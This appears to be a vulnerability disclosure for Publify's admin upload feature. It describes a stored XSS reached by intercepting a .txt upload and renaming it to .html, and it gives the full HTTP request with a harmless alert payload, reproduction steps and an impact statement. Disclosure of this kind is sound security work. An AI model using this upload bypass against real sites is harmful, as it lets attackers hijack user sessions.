Description

Unrestricted file upload allowed the attacker to manipulate the request and bypass the protection of HTML files using a text file, XSS Stored was obtained when uploading the HTML file.

Proof of Concept

POST /admin/resources/upload HTTP/1.1
Host: demo-publify.herokuapp.com
Cookie: _publify_blog_session=SESSION_HERE
Content-Length: 649
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryR7LwpeBoKn4f7hI5
Referer: https://demo-publify.herokuapp.com/admin/resources
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="utf8"

✓
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="authenticity_token"

TOKEN_HERE
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="upload"; filename="w00t.txt" -- Change to w00t.html
Content-Type: text/plain

<script>alert('OOPSS');</script>
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="commit"

Upload
------WebKitFormBoundaryR7LwpeBoKn4f7hI5--

• Step 1 - Upload a .txt file and intercept the request

• Step 2 - Change the extension of filename to .html

• Step 3 - Submit a request and the file will be uploaded successfully

Video

https://drive.google.com/file/d/1bNffqwUl_9Sn7wqpBvEAqvV_PGRadlPb/view?usp=sharing

Impact

Successful exploitation of cross-site scripting vulnerabilities allows an attacker to run arbitrary script code in the context of the affected user. This can be used to compromise the integrity of content returned by the webserver to take over a user's session, redirect the user to a malicious website.